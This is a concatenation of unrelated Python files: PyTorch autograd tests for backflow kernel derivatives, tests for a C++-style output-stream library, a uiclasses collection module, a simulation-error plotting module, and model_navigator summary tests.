        # flattened as (npts, nelec * 3), tracked for autograd
        self.npts = 11
        self.pos = torch.rand(self.npts, self.mol.nelec * 3)
        self.pos = Variable(self.pos)
        self.pos.requires_grad = True

    def test_derivative_backflow_kernel(self):
        """Test the derivative of the kernel function
        wrt the elec-elec distance."""
        ree = self.edist(self.pos)
        bf_kernel = self.kernel(ree)
        # autograd reference value
        dbf_kernel_auto = grad(
            bf_kernel, ree, grad_outputs=torch.ones_like(bf_kernel))[0]
        # analytic derivative provided by the kernel
        dbf_kernel = self.kernel(ree, derivative=1)
        assert(torch.allclose(dbf_kernel.sum(), dbf_kernel_auto.sum()))
        assert(torch.allclose(dbf_kernel, dbf_kernel_auto))

    def test_second_derivative_backflow_kernel(self):
        """Test the 2nd derivative of the kernel function
        wrt the elec-elec distance."""
        ree = self.edist(self.pos)
        bf_kernel = self.kernel(ree)
        # element-wise autograd Hessian as the reference
        d2bf_kernel_auto = hess_single_element(bf_kernel, ree)
        d2bf_kernel = self.kernel(ree, derivative=2)
        assert(torch.allclose(d2bf_kernel.sum(), d2bf_kernel_auto.sum()))
        assert(torch.allclose(d2bf_kernel, d2bf_kernel_auto))

    def test_derivative_backflow_kernel_pos(self):
        """Test the derivative of the kernel function wrt the pos of the elecs.

        Note that the derivative edist(pos,1) returns d r_ij = d/dx_i r_ij
        and that d/dx_j r_ij = d/d_xi r_ij = - d/dx_i r_ji
        i.e. edist(pos,1) returns half of the derivatives
        so to obtain the same values as autograd we need to double d/dx_i r_ij
        """
        # compute the ee dist
        ree = self.edist(self.pos)
        # compute the kernel values
        bfpos = self.kernel(ree)
        # computes the derivative of the ee dist
        di_ree = self.edist(self.pos, 1)
        dj_ree = di_ree
        # compute the derivative of the kernel values
        bf_der = self.kernel(
            ree, derivative=1)
        # get the der of the bf wrt the first elec in ree
        di_bfpos = bf_der.unsqueeze(1) * di_ree
        # need to take the transpose here
        # get the der of the bf wrt the second elec in ree
        dj_bfpos = (bf_der.permute(0, 2, 1)).unsqueeze(1) * dj_ree
        # add both components
        d_bfpos = di_bfpos + dj_bfpos
        # computes the derivative of the kernel values with autograd
        dbfpos_grad = grad(
            bfpos, self.pos, grad_outputs=torch.ones_like(bfpos))[0]
        # checksum
        assert(torch.allclose(d_bfpos.sum(), dbfpos_grad.sum()))
        # reshape and check individual elements
        dbfpos = d_bfpos.sum(-1).permute(0, 2,
                                         1).reshape(self.npts, -1)
        assert(torch.allclose(dbfpos, dbfpos_grad))

    def test_second_derivative_backflow_kernel_pos(self):
        """Test the 2nd derivative of the kernel function wrt the pos of the elecs.

        Note that the derivative edist(pos,1) returns d r_ij = d/dx_i r_ij
        and that d/dx_j r_ij = d/d_xi r_ij = - d/dx_i r_ji
        i.e. edist(pos,1) returns half of the derivatives
        Same thing for edist(pos,2)
        so to obtain the same values as autograd we need to double d/dx_i r_ij
        """
        # compute the ee dist
        ree = self.edist(self.pos)
        # compute the kernel values
        bf_kernel = self.kernel(ree)
        # computes the derivative of the ee dist
        di_ree = self.edist(self.pos, 1)
        dj_ree = di_ree
        # computes the second derivative of the ee dist
        d2i_ree = self.edist(self.pos, 2)
        d2j_ree = d2i_ree
        # chain rule: k'' * (dr)^2 terms for both electrons of each pair ...
        d2bf_kernel = self.kernel(
            ree, derivative=2).unsqueeze(1) * di_ree * di_ree
        d2bf_kernel += self.kernel(
            ree, derivative=2).permute(0, 2, 1).unsqueeze(1) * dj_ree * dj_ree
        # ... plus the k' * d2r terms
        d2bf_kernel += self.kernel(
            ree, derivative=1).unsqueeze(1) * d2i_ree
        d2bf_kernel += self.kernel(
            ree, derivative=1).permute(0, 2, 1).unsqueeze(1) * d2j_ree
        # computes the second derivative of the kernel values with autograd
        d2bf_kernel_auto = hess(bf_kernel, self.pos)
        # checksum
        assert(torch.allclose(d2bf_kernel.sum(), d2bf_kernel_auto.sum()))
        # reshape and check individual elements
        d2bf_kernel = d2bf_kernel.sum(-1).permute(0, 2,
                                                  1).reshape(self.npts, -1)
        assert(torch.allclose(d2bf_kernel, d2bf_kernel_auto))
if __name__ == "__main__":
    # Run the test suite when executed directly.
    unittest.main()
|
<filename>tests.py<gh_stars>0
import unittest
from io import StringIO
from ostream import OStream, endl, ends
from ostream.precisions import DefaultPrecision, FixedPrecision
from iomanip import setprecision, setfill, setw
class TestOStream(unittest.TestCase):
    """Behavioral tests for OStream's C++-style ``<<`` streaming interface."""

    def setUp(self):
        # Capture all output in memory so assertions can read it back.
        self.output_stream = StringIO()
        self.cout = OStream(output_stream=self.output_stream)

    def tearDown(self):
        self.cout = None
        self.output_stream.close()

    def _get_stream_value(self):
        # Everything written through self.cout so far.
        return self.output_stream.getvalue()

    def test_basic(self):
        # NOTE(review): "<NAME>" looks like anonymization residue -- the
        # expected string suggests the literal was originally "Olá mundo";
        # as written this assertion cannot pass.  Confirm against upstream.
        # pylint: disable=pointless-statement,expression-not-assigned
        self.cout << "<NAME>" << " " << "cruel!" << endl << ends
        self.assertEqual("Olá mundo cruel!\n\0", self._get_stream_value())

    def _test_numbers(self):
        # NOTE(review): leading underscore disables this test (not collected).
        # pylint: disable=pointless-statement,expression-not-assigned
        self.cout << 10 << "," << 2.0/5.0 << endl
        self.assertEqual("10,0.4\n", self._get_stream_value())

    def test_setprecicion(self):
        # setprecision should apply to subsequently streamed floats.
        # pylint: disable=pointless-statement,expression-not-assigned
        self.cout << setprecision(3) << 2.0/3.0
        self.assertEqual("0.67", self._get_stream_value())

    def test_set_fill_width(self):
        # setfill/setw pad only the next item, and only if it is shorter
        # than the requested width.
        # pylint: disable=pointless-statement,expression-not-assigned
        self.cout << "ABCD" << "\n" \
                  << setfill("-") << setw(4) \
                  << "EF" << "\n" \
                  << "IJKL" << "\n" \
                  << setfill("-") << setw(4) \
                  << "MNOPQRS\n" \
                  << setfill("-") << setw(4) \
                  << "TU\nVWXYZ"
        string = "ABCD\n" \
                 "--EF\n" \
                 "IJKL\n" \
                 "MNOPQRS\n" \
                 "TU\nVWXYZ"
        self.assertEqual(string, self._get_stream_value())

    def test_complex_stream(self):
        # Interleave precision and fill/width manipulators with text and
        # numbers in a single chained expression.
        # pylint: disable=pointless-statement,expression-not-assigned
        self.cout << "Olá mundo" \
                  << " cruel! " \
                  << 100.123 \
                  << setprecision(2) << "\n" \
                  << "depois do precision\n" \
                  << 100.1234 \
                  << " depois do número" \
                  << endl \
                  << "Hello World\n" \
                  << setfill('*') \
                  << setw(5) \
                  << "a\nb" \
                  << endl
        string = "Olá mundo cruel! 100.123\n" \
                 "depois do precision\n" \
                 "1e+02" \
                 " depois do número\n" \
                 "Hello World\n" \
                 "**a\n" \
                 "b\n"
        self.assertEqual(string, self._get_stream_value())
class TestScentificPrecision(unittest.TestCase):
    """DefaultPrecision mimics C++ default float formatting: `precision`
    significant digits, switching to scientific notation when they don't fit.

    NOTE(review): class name is misspelled ("Scentific"); left as-is since
    renaming would change the public test identifier.
    """

    def test_123_456(self):
        value = 123.456
        # Precision counts significant digits, not decimals.
        self.assertEqual("123.456", DefaultPrecision(6).handle(value))
        self.assertEqual("123.46", DefaultPrecision(5).handle(value))
        self.assertEqual("123.5", DefaultPrecision(4).handle(value))
        self.assertEqual("123", DefaultPrecision(3).handle(value))
        # Too few digits for the integer part -> scientific notation.
        self.assertEqual("1.2e+02", DefaultPrecision(2).handle(value))
        self.assertEqual("1e+02", DefaultPrecision(1).handle(value))

    def test_approximation(self):
        value = 199.999
        # Rounding may collapse to a shorter representation ("200").
        self.assertEqual("199.999", DefaultPrecision(6).handle(value))
        self.assertEqual("200", DefaultPrecision(5).handle(value))
        self.assertEqual("200", DefaultPrecision(4).handle(value))
        self.assertEqual("200", DefaultPrecision(3).handle(value))
        self.assertEqual("2e+02", DefaultPrecision(2).handle(value))
        self.assertEqual("2e+02", DefaultPrecision(1).handle(value))
class TestFixedPrecision(unittest.TestCase):
    """FixedPrecision mimics C++ ``std::fixed``: precision counts digits
    after the decimal point, zero-padding when needed."""

    def test_123_456(self):
        value = 123.456
        # Extra precision pads with trailing zeros ...
        self.assertEqual("123.456000", FixedPrecision(6).handle(value))
        self.assertEqual("123.45600", FixedPrecision(5).handle(value))
        self.assertEqual("123.4560", FixedPrecision(4).handle(value))
        self.assertEqual("123.456", FixedPrecision(3).handle(value))
        # ... less precision rounds the fraction.
        self.assertEqual("123.46", FixedPrecision(2).handle(value))
        self.assertEqual("123.5", FixedPrecision(1).handle(value))
        self.assertEqual("123", FixedPrecision(0).handle(value))

    def test_approximation(self):
        value = 199.999
        self.assertEqual("199.999000", FixedPrecision(6).handle(value))
        self.assertEqual("199.99900", FixedPrecision(5).handle(value))
        self.assertEqual("199.9990", FixedPrecision(4).handle(value))
        self.assertEqual("199.999", FixedPrecision(3).handle(value))
        # Rounding carries into the integer part.
        self.assertEqual("200.00", FixedPrecision(2).handle(value))
        self.assertEqual("200.0", FixedPrecision(1).handle(value))
        self.assertEqual("200", FixedPrecision(0).handle(value))
if __name__ == '__main__':
    # Allow running this test module directly from the command line.
    unittest.main()
|
<filename>uiclasses/collections.py
# Copyright (c) 2020 NewStore GmbH
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import itertools
from types import GeneratorType
from .base import Model, UserFriendlyObject
from .base import COLLECTION_TYPES
from typing import Iterable
from typing import Callable
from ordered_set import OrderedSet
from humanfriendly.tables import format_robust_table, format_pretty_table
from . import typing as internal_typing
# Concrete iterable types recognized without consulting ``__iter__``.
ITERABLES = (list, tuple, itertools.chain, set, map, filter, GeneratorType)


def is_iterable(values) -> bool:
    """Return ``True`` if *values* can be iterated over.

    Accepts any of the known concrete iterable types (including
    :class:`IterableCollection`) or any object exposing an ``__iter__``
    attribute that is callable.
    """
    # ``any([...])`` over two booleans is just a logical "or"; both operands
    # are side-effect free, so short-circuiting is behavior-preserving.
    return (
        isinstance(values, ITERABLES + (IterableCollection,))
        or callable(getattr(values, "__iter__", None))
    )
class IterableCollection(UserFriendlyObject):
    """Base mixin for ModelList and ModelSet; provides methods to
    manipulate iterable collections in ways that take advantage of the
    behavior of models.

    For example it supports filtering by instance attributes through a call
    to the :py:meth:`~uiclasses.base.Model.attribute_matches` method of each
    child.

    **Features:**

    - :py:meth:`~uiclasses.collections.IterableCollection.sorted_by` - sort by a single attribute
    - :py:meth:`~uiclasses.collections.IterableCollection.filter_by` - to filter by a single attribute
    - :py:meth:`~uiclasses.collections.IterableCollection.sorted` - alias to ``MyModel.List(sorted(my_model_collection))`` or ``.Set()``
    - :py:meth:`~uiclasses.collections.IterableCollection.filter` - alias to ``MyModel.List(filter(callback, my_model_collection))``
    - :py:meth:`~uiclasses.collections.IterableCollection.format_robust_table`
    - :py:meth:`~uiclasses.collections.IterableCollection.format_pretty_table`
    """

    __visible_attributes__ = ["model_class"]

    def __repr__(self):
        """Verbose representation: UI name plus every child."""
        return f"<{self.__ui_name__()} {list(self)}>"

    def __str__(self):
        """Compact representation: UI name plus the collection length."""
        return f"{self.__ui_name__()}[length={len(self)}]"

    def sorted(self, **kw):
        """returns a new collection of the same type with this collection's
        children sorted. Keyword arguments are forwarded to the builtin
        :func:`sorted` (e.g. ``key=`` and ``reverse=``).

        Example:

        .. code::

           x = MyModel.List([MyModel({"id": 2}), MyModel({"id": 3})])
           result = x.sorted(key=lambda model: model.id)
        """
        items = sorted(self, **kw)
        return self.__class__(items)

    def sorted_by(self, attribute: str, **kw):
        """sort by a single attribute of the model children.

        Example:

        .. code::

           x = MyModel.List([MyModel({"id": 2}), MyModel({"id": 3})])
           result = x.sorted_by('id')
        """
        # Falls back to dict-style ``.get()`` and finally "" so children
        # lacking the attribute still compare without raising.
        return self.sorted(
            key=lambda model: getattr(model, attribute, model.get(attribute))
            or "",
            **kw,
        )

    def filter_by(
        self, attribute_name: str, fnmatch_pattern: str
    ) -> internal_typing.IterableCollection[Model]:
        """filter by a single attribute of the model children using an
        fnmatch-style glob pattern.

        Example:

        .. code::

           x = MyModel.List([MyModel({"name": 'chucknorris'}), MyModel({"name": 'foobar'})])
           result = x.filter_by('name', '*norris*')
        """
        return self.filter(
            lambda model: model.attribute_matches(
                attribute_name, fnmatch_pattern
            )
        )

    def filter(self, check: Callable[[Model], bool]) -> Iterable[Model]:
        """returns a new collection of the same type with only the children
        for which ``check`` returned a truthy value.

        Example:

        .. code::

           x = MyModel.List([MyModel({"id": 2}), MyModel({"id": 3})])
           result = x.filter(lambda model: model.id)
        """
        results = filter(check, self)
        return self.__class__(results)

    def get_table_columns(self, columns: Iterable[str] = None):
        """proxy to :py:meth:`~uiclasses.base.Model.get_table_columns`

        Anything other than a ``list`` (including ``None``) falls back to
        the model's ``__visible_attributes__``.
        """
        available_columns = self.__of_model__.__visible_attributes__
        if not isinstance(columns, list):
            return available_columns
        return self.validate_columns(columns)

    def get_table_rows(self, columns: Iterable[str] = None):
        """returns a list of values from the __ui_attributes__ of each child of this collection.

        Used by
        :py:meth:`~uiclasses.collections.IterableCollection.format_robust_table`
        and
        :py:meth:`~uiclasses.collections.IterableCollection.format_pretty_table`.
        """
        columns = self.get_table_columns(columns)
        return [
            [model.__ui_attributes__().get(key) for key in columns]
            for model in self
        ]

    def get_table_columns_and_rows(self, columns: Iterable[str] = None):
        """returns a 2-item tuple with column names and row values of each
        child of this collection.

        Used by
        :py:meth:`~uiclasses.collections.IterableCollection.format_robust_table`
        and
        :py:meth:`~uiclasses.collections.IterableCollection.format_pretty_table`.
        """
        columns = self.get_table_columns(columns)
        rows = self.get_table_rows(columns)
        return columns, rows

    def format_robust_table(self, columns: Iterable[str] = None):
        """returns a string with a robust table ready to be printed on a terminal.

        powered by :py:func:`humanfriendly.tables.format_robust_table`
        """
        columns, rows = self.get_table_columns_and_rows(columns)
        return format_robust_table(rows, columns)

    def format_pretty_table(self, columns: Iterable[str] = None):
        """returns a string with a pretty table ready to be printed on a terminal.

        powered by :py:func:`humanfriendly.tables.format_pretty_table`
        """
        columns, rows = self.get_table_columns_and_rows(columns)
        return format_pretty_table(rows, columns)

    def validate_columns(self, columns):
        """Ensure every requested column is a visible attribute of the model.

        :raises ValueError: if any column name is unknown.
        """
        mismatched_columns = set(columns).difference(
            self.__of_model__.__visible_attributes__
        )
        if mismatched_columns:
            raise ValueError(
                f"the following columns are not available "
                f"for {self.__of_model__}: {mismatched_columns}"
            )
        return columns

    def to_dict(self, only_visible: bool = False) -> Iterable[dict]:
        """calls ``.to_dict()`` on each child of this collection."""
        return [m.to_dict(only_visible=only_visible) for m in self]

    def serialize(self, only_visible: bool = False) -> Iterable[dict]:
        """calls ``.serialize()`` on each child of this collection."""
        return [m.serialize(only_visible=only_visible) for m in self]

    def serialize_visible(self) -> Iterable[dict]:
        """calls ``.serialize_visible()`` on each child of this collection."""
        return [m.serialize_visible() for m in self]

    def serialize_all(self) -> Iterable[dict]:
        """calls ``.serialize_all()`` on each child of this collection."""
        return [m.serialize_all() for m in self]
class ModelList(list, IterableCollection):
    """Implementation of :py:class:`~uiclasses.collections.IterableCollection` for the
    :py:class:`list` type.
    """

    def __init__(self, children: Iterable[Model]):
        # ``__of_model__`` is presumably bound when declaring ``MyModel.List``
        # (see uiclasses.base); accessing it raises AttributeError if this
        # class was not created through that mechanism — TODO confirm.
        model_class = self.__of_model__
        if not is_iterable(children):
            raise TypeError(
                f"{self.__class__.__name__} requires the 'children' attribute to be "
                f"a valid iterable, got {children!r} {type(children)} instead"
            )
        items = []
        for index, child in enumerate(children):
            # Plain dicts are promoted to model instances before validation.
            if isinstance(child, dict):
                child = self.__of_model__(child)
            if not isinstance(child, model_class):
                raise TypeError(
                    f"cannot create {self.__class__.__name__} because value at index [{index}] is not a {model_class}: {child!r} {type(child)}"
                )
            items.append(child)
        # NOTE(review): each (already validated) child is wrapped in
        # model_class once more — presumably a copy-construction; confirm
        # Model accepts a Model instance.
        super().__init__(map(model_class, items))

    def unique(self) -> "ModelSet":
        """returns a :py:class:`~uiclasses.collections.ModelSet` of all unique items in this :py:class:`~uiclasses.collections.ModelList`"""
        return self.__of_model__.Set(self)
class ModelSet(OrderedSet, IterableCollection):
    """Implementation of :py:class:`~uiclasses.collections.IterableCollection` for the
    `OrderedSet <https://pypi.org/project/ordered-set/>`_ type.
    """

    def __init__(self, children: Iterable[Model]):
        # Unlike ModelList, a missing ``__of_model__`` yields None here;
        # NOTE(review): isinstance(child, None) below would then raise
        # TypeError rather than a clear error — confirm intent.
        model_class = getattr(self, "__of_model__", None)
        if not is_iterable(children):
            raise TypeError(
                f"{self.__class__.__name__} requires the 'children' attribute to be "
                f"a valid iterable, got {children!r} {type(children)} instead"
            )
        items = []
        for index, child in enumerate(children):
            # Plain dicts are promoted to model instances before validation.
            if isinstance(child, dict):
                child = self.__of_model__(child)
            if not isinstance(child, model_class):
                raise TypeError(
                    f"cannot create {self.__class__.__name__} because value at index [{index}] is not a {model_class}: {child!r} {type(child)}"
                )
            items.append(child)
        super().__init__(map(model_class, items))
# Register the concrete collection implementations so callers (see
# uiclasses.base, which defines COLLECTION_TYPES) can resolve them by
# native collection type.
COLLECTION_TYPES[iter] = IterableCollection
COLLECTION_TYPES[list] = ModelList
COLLECTION_TYPES[set] = ModelSet
COLLECTION_TYPES[OrderedSet] = ModelSet
|
import sessionFuncs as sf
import dataProcessing as dp
import numpy as np
import scipy.stats as stats
import matplotlib as mpl
from matplotlib.ticker import MultipleLocator, FormatStrFormatter
from mpl_toolkits.axes_grid1 import host_subplot
import mpl_toolkits.axisartist as AA
from types import *
class PSCCompAnalysis(object):
    """Groups simulation error data by container size relative to a reference
    (diameter, height) pair and plots histograms / probability plots of the
    per-group error distributions.

    Note: this module uses Python 2 syntax elsewhere (print statements);
    matplotlib/scipy/project modules (dp, sf) are required at runtime.
    """

    def __init__(self, simIds):
        # simIds: iterable of simulation identifiers understood by
        # dp.AnalysisData — TODO confirm the expected element type.
        self.sims = simIds
        self.sif = 'K1'                     # stress-intensity key used in error reports
        self.dists = ['norm', 't']          # distributions fitted/plotted
        self.errType = 'difference'         # which error report family to read
        self.dKeys = ['smaller', 'equal', 'larger']
        # Per-classification accumulated errors and the sim ids they came from.
        self.errs = {key: np.array([]) for key in self.dKeys}
        self.simIds = {key: set() for key in self.dKeys}

    def divideSimIds(self, limD, limH):
        """Classify every simulation as smaller/equal/larger than the
        reference container (limD, limH) and accumulate its errors.
        """
        self.d = limD
        self.h = limH
        for s in self.sims:
            ad = dp.AnalysisData(s)
            ad.calcAnSol()
            ad.calculateStats()
            simD = ad.getContainerDiam()
            simH = ad.getContainerHeight()
            errs = ad.getErrorReports()[self.errType][self.sif]
            # 'equal' only when both dimensions match exactly; 'larger' when
            # both are >= the limits; everything else counts as 'smaller'.
            if simD == limD and simH == limH:
                key = self.dKeys[1]
            elif simD >= limD and simH >= limH:
                key = self.dKeys[2]
            else:
                key = self.dKeys[0]
            self.simIds[key].add(s)
            self.errs[key] = np.concatenate((self.errs[key], errs))

    def delEmptySimIdClassificationSets(self):
        """Drop classifications that received no simulations at all."""
        for k in self.dKeys:
            if len(self.simIds[k]) == 0:
                del self.simIds[k]
                del self.errs[k]

    def manipulateErrors(self):
        """Clip each group's errors to within +/- self.lim of the group mean."""
        for k in self.errs.keys():
            avg = np.average(self.errs[k])
            self.errs[k] = [e for e in self.errs[k] if (
                (e <= avg + self.lim) and (e >= avg - self.lim))]

    def createFigureAxes(self):
        """Create one stacked subplot per remaining classification."""
        self.axes = []
        ncols = 1
        nrows = len(self.simIds)
        gs = mpl.gridspec.GridSpec(nrows=nrows, ncols=ncols)
        gs.update(wspace=0.04, hspace=0.08)
        for i in range(ncols * nrows):
            self.axes.append(self.fig.add_subplot(gs[i]))
            self.axes[i].grid(True)

    def createPSCStatPlots(self, limD, limH, bins, lim, fig):
        """Full pipeline: classify, prune, clip, then draw one histogram +
        fitted-distribution panel per classification on the given figure.
        """
        self.limD = limD
        self.limH = limH
        self.axes = []
        self.fig = fig
        self.lim = lim
        self.bins = bins
        self.divideSimIds(limD, limH)
        self.delEmptySimIdClassificationSets()
        self.manipulateErrors()
        self.createFigureAxes()
        i = 0
        for k in self.dKeys:
            if k in self.simIds:
                self.createPSCHistProbPlots(i, k)
                i += 1
        self.axes[-1].set_xlabel('errors difference')

    def createPSCHistProbPlots(self, i, key):
        """Draw histogram of errors for one classification plus fitted normal
        and Student-t probability density curves on axes[i].
        """
        errs = self.errs[key]
        x = np.arange(min(errs), max(errs), 0.1)
        mu, sigma = stats.norm.fit(errs)
        normpdf = stats.norm.pdf(x, mu, sigma)
        shape, loc, scale = stats.t.fit(errs)
        rv = stats.t(shape, loc=loc, scale=scale)
        # NOTE(review): `normed=True` is deprecated/removed in newer
        # matplotlib (use `density=True`) — this code targets an old release.
        self.axes[i].hist(errs, self.bins, normed=True,
                          color='MidnightBlue', alpha=0.7,
                          label='Errors {0}'.format(self.sif))
        self.axes[i].plot(x, normpdf,
                          'r', label='Normal fit')
        self.axes[i].plot(x, rv.pdf(x),
                          'g', label='T fit')
        text = self.getContainerDescription(key)
        self.axes[i].text(0.01, 0.9, text,
                          transform=self.axes[i].transAxes,
                          fontsize=14)
        self.axes[i].text(0.01, 0.7,
                          '$\mu=${0:.3}\n$\sigma=${1:.3}'.format(mu, sigma),
                          transform=self.axes[i].transAxes,
                          fontsize=14)
        h, l = self.axes[i].get_legend_handles_labels()
        self.axes[i].legend(h, l)
        self.axes[i].set_ylabel('Probability')
        self.axes[i].set_xlim((-self.lim, self.lim))

    def createPSCProbPlots(self, i, fig):
        """Draw normal and Student-t probability (Q-Q style) plots for the
        i-th (1-based) surviving classification on the given figure.
        """
        i = i - 1
        keys = []
        for k in self.dKeys:
            if k in self.simIds:
                keys.append(k)
        errs = self.errs[keys[i]]
        text = self.getContainerDescription(keys[i])
        fig.suptitle(text, fontsize=14)
        # NOTE(review): mu/sigma and shape are fitted but unused below; only
        # loc and scale feed the t-distribution sparams.
        mu, sigma = stats.norm.fit(errs)
        shape, loc, scale = stats.t.fit(errs)
        for i in range(len(self.dists)):
            dist = self.dists[i]
            ax = PLTAxes(fig.add_subplot(len(self.dists), 1, i + 1))
            if dist == 'norm':
                stats.probplot(errs, dist='norm', fit=True, plot=ax)
                ax.title('Normal probability plot')
            elif dist == 't':
                stats.probplot(errs, dist='t', fit=True,
                               sparams=(loc, scale),
                               plot=ax)
                ax.title('T probability plot')

    def getContainerDescription(self, key):
        """Return a short label like "Container d<10, h<20" for plot text."""
        if key == 'smaller':
            d = '<{0}'.format(self.limD)
            h = '<{0}'.format(self.limH)
        elif key == 'equal':
            d = '={0}'.format(self.limD)
            h = '={0}'.format(self.limH)
        else:
            d = '>{0}'.format(self.limD)
            h = '>{0}'.format(self.limH)
        text = 'Container d{0}, h{1}'.format(d, h)
        return text
class PLTAxes(object):
    """Thin adapter giving a matplotlib ``Axes`` a pyplot-like interface.

    ``scipy.stats.probplot`` drives its ``plot=`` argument through
    ``plot``/``title``/``xlabel``/``ylabel``/``text`` calls; this wrapper
    forwards them to the wrapped axes object.
    """

    def __init__(self, axes):
        self.axes = axes
        self.axes.grid(True)

    def plot(self, *args, **kargs):
        """Forward to ``axes.plot`` unless any ndarray argument holds a NaN."""
        contains_nan = any(
            isinstance(arg, (np.ndarray,)) and np.isnan(np.min(arg))
            for arg in args
        )
        if not contains_nan:
            self.axes.plot(*args, **kargs)

    def title(self, *args):
        self.axes.set_title(args[0])

    def xlabel(self, *args):
        self.axes.set_xlabel(args[0])

    def ylabel(self, *args):
        self.axes.set_ylabel(args[0])

    def text(self, *args):
        self.axes.text(args[0], args[1], args[2])
def assignSimIdAsFailed(trees, cq, selIdNum):
    """Mark the queued simulation selected by *selIdNum* as failed.

    Removes the sim id from the calculation queue ``cq``, records the failed
    state in the shelve and in ``trees`` via the ``sf`` session helpers, and
    prints the affected sim id. A ``None`` selection is a silent no-op; an
    unknown selection prints a hint instead.

    Fixes over the original: ``selIdNum is None`` instead of
    ``isinstance(selIdNum, NoneType)`` (which relied on ``from types import *``),
    dict membership without the redundant ``.keys()`` call, and
    function-style ``print(...)`` which is valid in both Python 2 and 3.
    """
    if selIdNum is None:
        # Nothing selected — deliberately do nothing.
        return
    if selIdNum not in cq.getQueueDict():
        print('Verify the selIdNum argument value')
        return
    simId = cq.getQueueDict()[selIdNum]
    cq.removeSimIdFromQueue(simId)
    sf.writeToShelve(simId, 'failed')
    sf.setSimIdAsFailed(trees, [simId])
    print(simId)
|
<reponame>triton-inference-server/model_navigator<gh_stars>10-100
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pathlib import Path
from model_navigator.model_analyzer.config import ModelAnalyzerAnalysisConfig
from model_navigator.model_analyzer.summary import Summary
from model_navigator.record.types.perf_latency import PerfLatency
from model_navigator.record.types.perf_throughput import PerfThroughput
# Directory holding the CSV fixtures (results.csv / metrics.csv) used by the
# tests below; resolves to ../../files relative to this test module.
FILES_DIR = Path(__file__).parent.parent.absolute() / "files"
def test_filter_results():
    """Summary._filter keeps exactly 10 rows from each fixture CSV."""
    analysis_config = ModelAnalyzerAnalysisConfig()
    results_file = FILES_DIR / "results.csv"
    metrics_file = FILES_DIR / "metrics.csv"
    summary = Summary(results_path=results_file, metrics_path=metrics_file,
                      analysis_config=analysis_config)
    raw_results = summary._rows_from_csv(file_path=results_file)
    raw_metrics = summary._rows_from_csv(file_path=metrics_file)
    assert len(summary._filter(raw_results)) == 10
    assert len(summary._filter(raw_metrics)) == 10
def test_top_results_perf():
    """With default objectives, top results are ordered by descending throughput."""
    analysis_config = ModelAnalyzerAnalysisConfig()
    results_file = FILES_DIR / "results.csv"
    metrics_file = FILES_DIR / "metrics.csv"
    summary = Summary(results_path=results_file, metrics_path=metrics_file,
                      analysis_config=analysis_config)
    raw_results = summary._rows_from_csv(file_path=results_file)
    raw_metrics = summary._rows_from_csv(file_path=metrics_file)
    best = summary._top_results(summary._filter(raw_results))
    best_metrics = summary._top_metrics(raw_metrics, best)
    assert analysis_config.top_n_configs == 3
    assert len(best) == 3
    assert len(best_metrics) == 3
    throughput_key = PerfThroughput.header()
    for earlier, later in zip(best, best[1:]):
        assert earlier[throughput_key] >= later[throughput_key]
def test_top_results_latency():
    """With a latency objective, top results are ordered by ascending latency."""
    analysis_config = ModelAnalyzerAnalysisConfig()
    analysis_config.objectives = {"perf_latency": 10}
    results_file = FILES_DIR / "results.csv"
    metrics_file = FILES_DIR / "metrics.csv"
    summary = Summary(results_path=results_file, metrics_path=metrics_file,
                      analysis_config=analysis_config)
    raw_results = summary._rows_from_csv(file_path=results_file)
    raw_metrics = summary._rows_from_csv(file_path=metrics_file)
    best = summary._top_results(summary._filter(raw_results))
    best_metrics = summary._top_metrics(raw_metrics, best)
    assert analysis_config.top_n_configs == 3
    assert len(best) == 3
    assert len(best_metrics) == 3
    latency_key = PerfLatency.header()
    for earlier, later in zip(best, best[1:]):
        assert earlier[latency_key] <= later[latency_key]
def test_top_results_wighted():
    """Weighted throughput+latency objectives produce a blended ranking.

    NOTE(review): "wighted" is likely a typo for "weighted"; the name is
    kept unchanged to preserve the test id.
    """
    analysis_config = ModelAnalyzerAnalysisConfig()
    analysis_config.objectives = {"perf_throughput": 10, "perf_latency": 5}
    results_file = FILES_DIR / "results.csv"
    metrics_file = FILES_DIR / "metrics.csv"
    summary = Summary(results_path=results_file, metrics_path=metrics_file,
                      analysis_config=analysis_config)
    raw_results = summary._rows_from_csv(file_path=results_file)
    raw_metrics = summary._rows_from_csv(file_path=metrics_file)
    best = summary._top_results(summary._filter(raw_results))
    best_metrics = summary._top_metrics(raw_metrics, best)
    assert analysis_config.top_n_configs == 3
    assert len(best) == 3
    assert len(best_metrics) == 3
    latency_key = PerfLatency.header()
    throughput_key = PerfThroughput.header()
    # 1st choice
    assert best[0][latency_key] <= best[1][latency_key]
    assert best[0][throughput_key] <= best[1][throughput_key]
    # 2nd choice
    assert best[1][latency_key] <= best[2][latency_key]
    assert best[1][throughput_key] >= best[2][throughput_key]
def test_prepare_results():
    """_prepare trims both results and metrics down to top_n_configs entries."""
    analysis_config = ModelAnalyzerAnalysisConfig()
    summary = Summary(results_path=FILES_DIR / "results.csv",
                      metrics_path=FILES_DIR / "metrics.csv",
                      analysis_config=analysis_config)
    summary._prepare()
    assert analysis_config.top_n_configs == 3
    assert len(summary.get_results()) == analysis_config.top_n_configs
    assert len(summary.get_metrics()) == analysis_config.top_n_configs
def test_print_results():
    """Smoke test: Summary.show() runs end-to-end without raising."""
